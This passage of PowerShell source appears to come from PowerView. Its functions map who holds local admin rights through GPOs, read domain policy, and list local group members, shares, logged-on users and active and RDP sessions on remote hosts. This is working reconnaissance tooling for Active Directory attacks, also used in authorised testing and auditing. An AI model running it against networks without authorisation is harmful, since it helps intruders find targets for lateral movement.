Get-NetComputer, Get-SiteName, Get-NetSite, Get-NetGPOGroup, Get-ADObject, Get-NetGroupMember, Convert-SidToName Optional Dependencies: None .DESCRIPTION If a -ComputerName is specified, retrieve the complete computer object, attempt to determine the OU the computer is a part of. Then resolve the computer's site name with Get-SiteName and retrieve all sites object Get-NetSite. For those results, attempt to enumerate all linked GPOs and associated local group settings with Get-NetGPOGroup. For each resulting GPO group, resolve the resulting user/group name to a full AD object and return the results. This will return the domain objects that are members of the specified -LocalGroup for the given computer. Inverse of Find-GPOLocation. .PARAMETER ComputerName The computer to determine local administrative access to. .PARAMETER OUName OU name to determine who has local adminisrtative acess to computers within it. .PARAMETER Domain Optional domain the computer/OU exists in, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER Recurse Switch. If a returned member is a group, recurse and get all members. .PARAMETER LocalGroup The local group to check access against. Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), or a custom local SID. Defaults to local 'Administrators'. .PARAMETER UsePSDrive Switch. Mount any found policy files with temporary PSDrives. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local Finds users who have local admin rights over WINDOWS3 through GPO correlation. .EXAMPLE PS C:\> Find-GPOComputerAdmin -ComputerName WINDOWS3.dev.testlab.local -LocalGroup RDP Finds users who have RDP rights over WINDOWS3 through GPO correlation. #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $ComputerName, [String] $OUName, [String] $Domain, [String] $DomainController, [Switch] $Recurse, [String] $LocalGroup = 'Administrators', [Switch] $UsePSDrive, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) process { if(!$ComputerName -and !$OUName) { Throw "-ComputerName or -OUName must be provided" } $GPOGroups = @() if($ComputerName) { $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize if(!$Computers) { throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name" } $TargetOUs = @() ForEach($Computer in $Computers) { # extract all OUs a computer is a part of $DN = $Computer.distinguishedname $TargetOUs += $DN.split(",") | ForEach-Object { if($_.startswith("OU=")) { $DN.substring($DN.indexof($_)) } } } # enumerate any linked GPOs for the computer's site $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName if($ComputerSite -and ($ComputerSite -notlike 'Error*')) { $GPOGroups += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object { if($_.gplink) { $_.gplink.split("][") | ForEach-Object { if ($_.startswith("LDAP")) { $_.split(";")[0] } } } } | ForEach-Object { $GPOGroupArgs = @{ 'Domain' = $Domain 'DomainController' = $DomainController 'ResolveMemberSIDs' = $True 'UsePSDrive' = $UsePSDrive 'PageSize' = $PageSize } # for each GPO link, get any locally set user/group SIDs Get-NetGPOGroup @GPOGroupArgs } } } else { $TargetOUs = @($OUName) } Write-Verbose "Target OUs: $TargetOUs" $TargetOUs | Where-Object {$_} | ForEach-Object { $GPOLinks = Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $_ -FullData -PageSize $PageSize | ForEach-Object { # and then get any GPO links if($_.gplink) { $_.gplink.split("][") | ForEach-Object { if ($_.startswith("LDAP")) { $_.split(";")[0] } } } } $GPOGroupArgs = @{ 'Domain' = $Domain 'DomainController' = $DomainController 'UsePSDrive' = $UsePSDrive 'ResolveMemberSIDs' = $True 'PageSize' = $PageSize } # extract GPO groups that are set through any gPlink for this OU $GPOGroups += Get-NetGPOGroup @GPOGroupArgs | ForEach-Object { ForEach($GPOLink in $GPOLinks) { $Name = $_.GPOName if($GPOLink -like "*$Name*") { $_ } } } } # for each found GPO group, resolve the SIDs of the members $GPOgroups | Sort-Object -Property GPOName -Unique | ForEach-Object { $GPOGroup = $_ if($GPOGroup.GroupMembers) { $GPOMembers = $GPOGroup.GroupMembers } else { $GPOMembers = $GPOGroup.GroupSID } $GPOMembers | ForEach-Object { # resolve this SID to a domain object $Object = Get-ADObject -Domain $Domain -DomainController $DomainController -PageSize $PageSize -SID $_ $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype $GPOComputerAdmin = New-Object PSObject $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $Object.samaccountname $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_ $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $IsGroup $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOGroup.GPOType $GPOComputerAdmin # if we're recursing and the current result object is a group if($Recurse -and $GPOComputerAdmin.isGroup) { Get-NetGroupMember -Domain $Domain -DomainController $DomainController -SID $_ -FullData -Recurse -PageSize $PageSize | ForEach-Object { $MemberDN = $_.distinguishedName # extract the FQDN from the Distinguished Name $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype if ($_.samAccountName) { # forest users have the samAccountName set $MemberName = $_.samAccountName } else { # external trust users have a SID, so convert it try { $MemberName = Convert-SidToName $_.cn } catch { # if there's a problem contacting the domain to resolve the SID $MemberName = $_.cn } } $GPOComputerAdmin = New-Object PSObject $GPOComputerAdmin | Add-Member Noteproperty 'ComputerName' $ComputerName $GPOComputerAdmin | Add-Member Noteproperty 'ObjectName' $MemberName $GPOComputerAdmin | Add-Member Noteproperty 'ObjectDN' $MemberDN $GPOComputerAdmin | Add-Member Noteproperty 'ObjectSID' $_.objectsid $GPOComputerAdmin | Add-Member Noteproperty 'IsGroup' $MemberIsGrou $GPOComputerAdmin | Add-Member Noteproperty 'GPODisplayName' $GPOGroup.GPODisplayName $GPOComputerAdmin | Add-Member Noteproperty 'GPOGuid' $GPOGroup.GPOName $GPOComputerAdmin | Add-Member Noteproperty 'GPOPath' $GPOGroup.GPOPath $GPOComputerAdmin | Add-Member Noteproperty 'GPOType' $GPOTypep $GPOComputerAdmin } } } } } } function Get-DomainPolicy { <# .SYNOPSIS Returns the default domain or DC policy for a given domain or domain controller. Thanks Sean Metacalf (@pyrotek3) for the idea and guidance. .PARAMETER Source Extract Domain or DC (domain controller) policies. .PARAMETER Domain The domain to query for default policies, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ResolveSids Switch. Resolve Sids from a DC policy to object names. .PARAMETER UsePSDrive Switch. Mount any found policy files with temporary PSDrives. .EXAMPLE PS C:\> Get-DomainPolicy Returns the domain policy for the current domain. .EXAMPLE PS C:\> Get-DomainPolicy -Source DC -DomainController MASTER.testlab.local Returns the policy for the MASTER.testlab.local domain controller. #> [CmdletBinding()] Param ( [String] [ValidateSet("Domain","DC")] $Source ="Domain", [String] $Domain, [String] $DomainController, [Switch] $ResolveSids, [Switch] $UsePSDrive ) if($Source -eq "Domain") { # query the given domain for the default domain policy object $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{31B2F340-016D-11D2-945F-00C04FB984F9}" if($GPO) { # grab the GptTmpl.inf file and parse it $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" $ParseArgs = @{ 'GptTmplPath' = $GptTmplPath 'UsePSDrive' = $UsePSDrive } # parse the GptTmpl.inf Get-GptTmpl @ParseArgs } } elseif($Source -eq "DC") { # query the given domain/dc for the default domain controller policy object $GPO = Get-NetGPO -Domain $Domain -DomainController $DomainController -GPOname "{6AC1786C-016F-11D2-945F-00C04FB984F9}" if($GPO) { # grab the GptTmpl.inf file and parse it $GptTmplPath = $GPO.gpcfilesyspath + "\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" $ParseArgs = @{ 'GptTmplPath' = $GptTmplPath 'UsePSDrive' = $UsePSDrive } # parse the GptTmpl.inf Get-GptTmpl @ParseArgs | ForEach-Object { if($ResolveSids) { # if we're resolving sids in PrivilegeRights to names $Policy = New-Object PSObject $_.psobject.properties | ForEach-Object { if( $_.Name -eq 'PrivilegeRights') { $PrivilegeRights = New-Object PSObject # for every nested SID member of PrivilegeRights, try to unpack everything and resolve the SIDs as appropriate $_.Value.psobject.properties | ForEach-Object { $Sids = $_.Value | ForEach-Object { try { if($_ -isnot [System.Array]) { Convert-SidToName $_ } else { $_ | ForEach-Object { Convert-SidToName $_ } } } catch { Write-Verbose "Error resolving SID : $_" } } $PrivilegeRights | Add-Member Noteproperty $_.Name $Sids } $Policy | Add-Member Noteproperty 'PrivilegeRights' $PrivilegeRights } else { $Policy | Add-Member Noteproperty $_.Name $_.Value } } $Policy } else { $_ } } } } } ######################################################## # # Functions that enumerate a single host, either through # WinNT, WMI, remote registry, or API calls # (with PSReflect). # ######################################################## function Get-NetLocalGroup { <# .SYNOPSIS Gets a list of all current users in a specified local group, or returns the names of all local groups with -ListGroups. .PARAMETER ComputerName The hostname or IP to query for local group users. .PARAMETER ComputerFile File of hostnames/IPs to query for local group users. .PARAMETER GroupName The local group name to query for users. If not given, it defaults to "Administrators" .PARAMETER ListGroups Switch. List all the local groups instead of their members. Old Get-NetLocalGroups functionality. .PARAMETER Recurse Switch. If the local member member is a domain group, recursively try to resolve its members to get a list of domain users who can access this machine. .PARAMETER API Switch. Use API calls instead of the WinNT service provider. Less information, but the results are faster. .EXAMPLE PS C:\> Get-NetLocalGroup Returns the usernames that of members of localgroup "Administrators" on the local host. .EXAMPLE PS C:\> Get-NetLocalGroup -ComputerName WINDOWSXP Returns all the local administrator accounts for WINDOWSXP .EXAMPLE PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -Recurse Returns all effective local/domain users/groups that can access WINDOWS7 with local administrative privileges. .EXAMPLE PS C:\> Get-NetLocalGroup -ComputerName WINDOWS7 -ListGroups Returns all local groups on the WINDOWS7 host. .EXAMPLE PS C:\> "WINDOWS7", "WINDOWSSP" | Get-NetLocalGroup -API Returns all local groups on the the passed hosts using API calls instead of the WinNT service provider. .LINK http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx #> [CmdletBinding(DefaultParameterSetName = 'WinNT')] param( [Parameter(ParameterSetName = 'API', Position=0, ValueFromPipeline=$True)] [Parameter(ParameterSetName = 'WinNT', Position=0, ValueFromPipeline=$True)] [Alias('HostName')] [String[]] $ComputerName = $Env:ComputerName, [Parameter(ParameterSetName = 'WinNT')] [Parameter(ParameterSetName = 'API')] [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [Parameter(ParameterSetName = 'WinNT')] [Parameter(ParameterSetName = 'API')] [String] $GroupName = 'Administrators', [Parameter(ParameterSetName = 'WinNT')] [Switch] $ListGroups, [Parameter(ParameterSetName = 'WinNT')] [Switch] $Recurse, [Parameter(ParameterSetName = 'API')] [Switch] $API ) process { $Servers = @() # if we have a host list passed, grab it if($ComputerFile) { $Servers = Get-Content -Path $ComputerFile } else { # otherwise assume a single host name $Servers += $ComputerName | Get-NameField } # query the specified group using the WINNT provider, and # extract fields as appropriate from the results ForEach($Server in $Servers) { if($API) { # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information # arguments for NetLocalGroupGetMembers $QueryLevel = 2 $PtrInfo = [IntPtr]::Zero $EntriesRead = 0 $TotalRead = 0 $ResumeHandle = 0 # get the local user information $Result = $Netapi32::NetLocalGroupGetMembers($Server, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) # Locate the offset of the initial intPtr $Offset = $PtrInfo.ToInt64() $LocalUsers = @() # 0 = success if (($Result -eq 0) -and ($Offset -gt 0)) { # Work out how much to increment the pointer by finding out the size of the structure $Increment = $LOCALGROUP_MEMBERS_INFO_2::GetSize() # parse all the result structures for ($i = 0; ($i -lt $EntriesRead); $i++) { # create a new int ptr at the given offset and cast the pointer as our result structure $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset $Info = $NewIntPtr -as $LOCALGROUP_MEMBERS_INFO_2 $Offset = $NewIntPtr.ToInt64() $Offset += $Increment $SidString = "" $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() if($Result2 -eq 0) { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } else { $LocalUser = New-Object PSObject $LocalUser | Add-Member Noteproperty 'ComputerName' $Server $LocalUser | Add-Member Noteproperty 'AccountName' $Info.lgrmi2_domainandname $LocalUser | Add-Member Noteproperty 'SID' $SidString $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup') $LocalUser | Add-Member Noteproperty 'IsGroup' $IsGroup $LocalUser.PSObject.TypeNames.Add('PowerView.LocalUserAPI') $LocalUsers += $LocalUser } } # free up the result buffer $Null = $Netapi32::NetApiBufferFree($PtrInfo) # try to extract out the machine SID by using the -500 account as a reference $MachineSid = $LocalUsers | Where-Object {$_.SID -like '*-500'} $Parts = $MachineSid.SID.Split('-') $MachineSid = $Parts[0..($Parts.Length -2)] -join '-' $LocalUsers | ForEach-Object { if($_.SID -match $MachineSid) { $_ | Add-Member Noteproperty 'IsDomain' $False } else { $_ | Add-Member Noteproperty 'IsDomain' $True } } $LocalUsers } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } else { # otherwise we're using the WinNT service provider try { if($ListGroups) { # if we're listing the group names on a remote server $Computer = [ADSI]"WinNT://$Server,computer" $Computer.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object { $Group = New-Object PSObject $Group | Add-Member Noteproperty 'Server' $Server $Group | Add-Member Noteproperty 'Group' ($_.name[0]) $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier $_.objectsid[0],0).Value) $Group | Add-Member Noteproperty 'Description' ($_.Description[0]) $Group.PSObject.TypeNames.Add('PowerView.LocalGroup') $Group } } else { # otherwise we're listing the group members $Members = @($([ADSI]"WinNT://$Server/$GroupName,group").psbase.Invoke('Members')) $Members | ForEach-Object { $Member = New-Object PSObject $Member | Add-Member Noteproperty 'ComputerName' $Server $AdsPath = ($_.GetType().InvokeMember('Adspath', 'GetProperty', $Null, $_, $Null)).Replace('WinNT://', '') $Class = $_.GetType().InvokeMember('Class', 'GetProperty', $Null, $_, $Null) # try to translate the NT4 domain to a FQDN if possible $Name = Convert-ADName -ObjectName $AdsPath -InputType 'NT4' -OutputType 'Canonical' $IsGroup = $Class -eq "Group" if($Name) { $FQDN = $Name.split("/")[0] $ObjName = $AdsPath.split("/")[-1] $Name = "$FQDN/$ObjName" $IsDomain = $True } else { $ObjName = $AdsPath.split("/")[-1] $Name = $AdsPath $IsDomain = $False } $Member | Add-Member Noteproperty 'AccountName' $Name $Member | Add-Member Noteproperty 'IsDomain' $IsDomain $Member | Add-Member Noteproperty 'IsGroup' $IsGroup if($IsDomain) { # translate the binary sid to a string $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($_.GetType().InvokeMember('ObjectSID', 'GetProperty', $Null, $_, $Null),0)).Value) $Member | Add-Member Noteproperty 'Description' "" $Member | Add-Member Noteproperty 'Disabled' "" if($IsGroup) { $Member | Add-Member Noteproperty 'LastLogin' "" } else { try { $Member | Add-Member Noteproperty 'LastLogin' ( $_.GetType().InvokeMember('LastLogin', 'GetProperty', $Null, $_, $Null)) } catch { $Member | Add-Member Noteproperty 'LastLogin' "" } } $Member | Add-Member Noteproperty 'PwdLastSet' "" $Member | Add-Member Noteproperty 'PwdExpired' "" $Member | Add-Member Noteproperty 'UserFlags' "" } else { # repull this user object so we can ensure correct information $LocalUser = $([ADSI] "WinNT://$AdsPath") # translate the binary sid to a string $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.objectSid.value,0)).Value) $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description[0]) if($IsGroup) { $Member | Add-Member Noteproperty 'PwdLastSet' "" $Member | Add-Member Noteproperty 'PwdExpired' "" $Member | Add-Member Noteproperty 'UserFlags' "" $Member | Add-Member Noteproperty 'Disabled' "" $Member | Add-Member Noteproperty 'LastLogin' "" } else { $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0])) $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1') $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] ) # UAC flags of 0x2 mean the account is disabled $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.userFlags.value -band 2) -eq 2) try { $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0]) } catch { $Member | Add-Member Noteproperty 'LastLogin' "" } } } $Member.PSObject.TypeNames.Add('PowerView.LocalUser') $Member # if the result is a group domain object and we're recursing, # try to resolve all the group member results if($Recurse -and $IsGroup) { if($IsDomain) { $FQDN = $Name.split("/")[0] $GroupName = $Name.split("/")[1].trim() Get-NetGroupMember -GroupName $GroupName -Domain $FQDN -FullData -Recurse | ForEach-Object { $Member = New-Object PSObject $Member | Add-Member Noteproperty 'ComputerName' "$FQDN/$($_.GroupName)" $MemberDN = $_.distinguishedName # extract the FQDN from the Distinguished Name $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' $MemberIsGroup = @('268435456','268435457','536870912','536870913') -contains $_.samaccounttype if ($_.samAccountName) { # forest users have the samAccountName set $MemberName = $_.samAccountName } else { try { # external trust users have a SID, so convert it try { $MemberName = Convert-SidToName $_.cn } catch { # if there's a problem contacting the domain to resolve the SID $MemberName = $_.cn } } catch { Write-Debug "Error resolving SID : $_" } } $Member | Add-Member Noteproperty 'AccountName' "$MemberDomain/$MemberName" $Member | Add-Member Noteproperty 'SID' $_.objectsid $Member | Add-Member Noteproperty 'Description' $_.description $Member | Add-Member Noteproperty 'Disabled' $False $Member | Add-Member Noteproperty 'IsGroup' $MemberIsGroup $Member | Add-Member Noteproperty 'IsDomain' $True $Member | Add-Member Noteproperty 'LastLogin' '' $Member | Add-Member Noteproperty 'PwdLastSet' $_.pwdLastSet $Member | Add-Member Noteproperty 'PwdExpired' '' $Member | Add-Member Noteproperty 'UserFlags' $_.userAccountControl $Member.PSObject.TypeNames.Add('PowerView.LocalUser') $Member } } else { Get-NetLocalGroup -ComputerName $Server -GroupName $ObjName -Recurse } } } } } catch { Write-Warning "[!] Error: $_" } } } } } filter Get-NetShare { <# .SYNOPSIS This function will execute the NetShareEnum Win32API call to query a given host for open shares. This is a replacement for "net share \\hostname" .PARAMETER ComputerName The hostname to query for shares. Also accepts IP addresses. .OUTPUTS SHARE_INFO_1 structure. A representation of the SHARE_INFO_1 result structure which includes the name and note for each share, with the ComputerName added. .EXAMPLE PS C:\> Get-NetShare Returns active shares on the local host. .EXAMPLE PS C:\> Get-NetShare -ComputerName sqlserver Returns active shares on the 'sqlserver' host .EXAMPLE PS C:\> Get-NetComputer | Get-NetShare Returns all shares for all computers in the domain. .LINK http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost' ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # arguments for NetShareEnum $QueryLevel = 1 $PtrInfo = [IntPtr]::Zero $EntriesRead = 0 $TotalRead = 0 $ResumeHandle = 0 # get the share information $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) # Locate the offset of the initial intPtr $Offset = $PtrInfo.ToInt64() # 0 = success if (($Result -eq 0) -and ($Offset -gt 0)) { # Work out how much to increment the pointer by finding out the size of the structure $Increment = $SHARE_INFO_1::GetSize() # parse all the result structures for ($i = 0; ($i -lt $EntriesRead); $i++) { # create a new int ptr at the given offset and cast the pointer as our result structure $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset $Info = $NewIntPtr -as $SHARE_INFO_1 # return all the sections of the structure $Shares = $Info | Select-Object * $Shares | Add-Member Noteproperty 'ComputerName' $Computer $Offset = $NewIntPtr.ToInt64() $Offset += $Increment $Shares } # free up the result buffer $Null = $Netapi32::NetApiBufferFree($PtrInfo) } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } filter Get-NetLoggedon { <# .SYNOPSIS This function will execute the NetWkstaUserEnum Win32API call to query a given host for actively logged on users. .PARAMETER ComputerName The hostname to query for logged on users. .OUTPUTS WKSTA_USER_INFO_1 structure. A representation of the WKSTA_USER_INFO_1 result structure which includes the username and domain of logged on users, with the ComputerName added. .EXAMPLE PS C:\> Get-NetLoggedon Returns users actively logged onto the local host. .EXAMPLE PS C:\> Get-NetLoggedon -ComputerName sqlserver Returns users actively logged onto the 'sqlserver' host. .EXAMPLE PS C:\> Get-NetComputer | Get-NetLoggedon Returns all logged on userse for all computers in the domain. .LINK http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost' ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # Declare the reference variables $QueryLevel = 1 $PtrInfo = [IntPtr]::Zero $EntriesRead = 0 $TotalRead = 0 $ResumeHandle = 0 # get logged on user information $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) # Locate the offset of the initial intPtr $Offset = $PtrInfo.ToInt64() # 0 = success if (($Result -eq 0) -and ($Offset -gt 0)) { # Work out how much to increment the pointer by finding out the size of the structure $Increment = $WKSTA_USER_INFO_1::GetSize() # parse all the result structures for ($i = 0; ($i -lt $EntriesRead); $i++) { # create a new int ptr at the given offset and cast the pointer as our result structure $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset $Info = $NewIntPtr -as $WKSTA_USER_INFO_1 # return all the sections of the structure $LoggedOn = $Info | Select-Object * $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer $Offset = $NewIntPtr.ToInt64() $Offset += $Increment $LoggedOn } # free up the result buffer $Null = $Netapi32::NetApiBufferFree($PtrInfo) } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } filter Get-NetSession { <# .SYNOPSIS This function will execute the NetSessionEnum Win32API call to query a given host for active sessions on the host. Heavily adapted from dunedinite's post on stackoverflow (see LINK below) .PARAMETER ComputerName The ComputerName to query for active sessions. .PARAMETER UserName The user name to filter for active sessions. .OUTPUTS SESSION_INFO_10 structure. A representation of the SESSION_INFO_10 result structure which includes the host and username associated with active sessions, with the ComputerName added. .EXAMPLE PS C:\> Get-NetSession Returns active sessions on the local host. .EXAMPLE PS C:\> Get-NetSession -ComputerName sqlserver Returns active sessions on the 'sqlserver' host. .EXAMPLE PS C:\> Get-NetDomainController | Get-NetSession Returns active sessions on all domain controllers. .LINK http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost', [String] $UserName = '' ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # arguments for NetSessionEnum $QueryLevel = 10 $PtrInfo = [IntPtr]::Zero $EntriesRead = 0 $TotalRead = 0 $ResumeHandle = 0 # get session information $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) # Locate the offset of the initial intPtr $Offset = $PtrInfo.ToInt64() # 0 = success if (($Result -eq 0) -and ($Offset -gt 0)) { # Work out how much to increment the pointer by finding out the size of the structure $Increment = $SESSION_INFO_10::GetSize() # parse all the result structures for ($i = 0; ($i -lt $EntriesRead); $i++) { # create a new int ptr at the given offset and cast the pointer as our result structure $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset $Info = $NewIntPtr -as $SESSION_INFO_10 # return all the sections of the structure $Sessions = $Info | Select-Object * $Sessions | Add-Member Noteproperty 'ComputerName' $Computer $Offset = $NewIntPtr.ToInt64() $Offset += $Increment $Sessions } # free up the result buffer $Null = $Netapi32::NetApiBufferFree($PtrInfo) } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)" } } filter Get-LoggedOnLocal { <# .SYNOPSIS This function will query the HKU registry values to retrieve the local logged on users SID and then attempt and reverse it. Adapted technique from Sysinternal's PSLoggedOn script. Benefit over using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges required (NetWkstaUserEnum requires remote admin access). Note: This function requires only domain user rights on the machine you're enumerating, but remote registry must be enabled. Function: Get-LoggedOnLocal Author: Matt Kelly, @BreakersAll .PARAMETER ComputerName The ComputerName to query for active sessions. .EXAMPLE PS C:\> Get-LoggedOnLocal Returns active sessions on the local host. .EXAMPLE PS C:\> Get-LoggedOnLocal -ComputerName sqlserver Returns active sessions on the 'sqlserver' host. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost' ) # process multiple host object types from the pipeline $ComputerName = Get-NameField -Object $ComputerName try { # retrieve HKU remote registry values $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName") # sort out bogus sid's like _class $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object { $UserName = Convert-SidToName $_ $Parts = $UserName.Split('\') $UserDomain = $Null $UserName = $Parts[-1] if ($Parts.Length -eq 2) { $UserDomain = $Parts[0] } $LocalLoggedOnUser = New-Object PSObject $LocalLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName" $LocalLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain $LocalLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName $LocalLoggedOnUser | Add-Member Noteproperty 'UserSID' $_ $LocalLoggedOnUser } } catch { Write-Verbose "Error opening remote registry on '$ComputerName'" } } filter Get-NetRDPSession { <# .SYNOPSIS This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation Win32API calls to query a given RDP remote service for active sessions and originating IPs. This is a replacement for qwinsta. Note: only members of the Administrators or Account Operators local group can successfully execute this functionality on a remote target. .PARAMETER ComputerName The hostname to query for active RDP sessions. .EXAMPLE PS C:\> Get-NetRDPSession Returns active RDP/terminal sessions on the local host. .EXAMPLE PS C:\> Get-NetRDPSession -ComputerName "sqlserver" Returns active RDP/terminal sessions on the 'sqlserver' host. .EXAMPLE PS C:\> Get-NetDomainController | Get-NetRDPSession Returns active RDP/terminal sessions on all domain controllers. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost' ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # open up a handle to the Remote Desktop Session host $Handle = $Wtsapi32::WTSOpenServerEx($Computer) # if we get a non-zero handle back, everything was successful if ($Handle -ne 0) { # arguments for WTSEnumerateSessionsEx $ppSessionInfo = [IntPtr]::Zero $pCount = 0 # get information on all current sessions $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() # Locate the offset of the initial intPtr $Offset = $ppSessionInfo.ToInt64() if (($Result -ne 0) -and ($Offset -gt 0)) { # Work out how much to increment the pointer by finding out the size of the structure $Increment = $WTS_SESSION_INFO_1::GetSize() # parse all the result structures for ($i = 0; ($i -lt $pCount); $i++) { # create a new int ptr at the given offset and cast the pointer as our result structure $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset $Info = $NewIntPtr -as $WTS_SESSION_INFO_1 $RDPSession = New-Object PSObject if ($Info.pHostName) { $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName } else { # if no hostname returned, use the specified hostname $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer } $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) { # if a domain isn't returned just use the username $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)" } else { $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)" } $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID $RDPSession | Add-Member Noteproperty 'State' $Info.State $ppBuffer = [IntPtr]::Zero $pBytesReturned = 0 # query for the source client IP with WTSQuerySessionInformation # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, 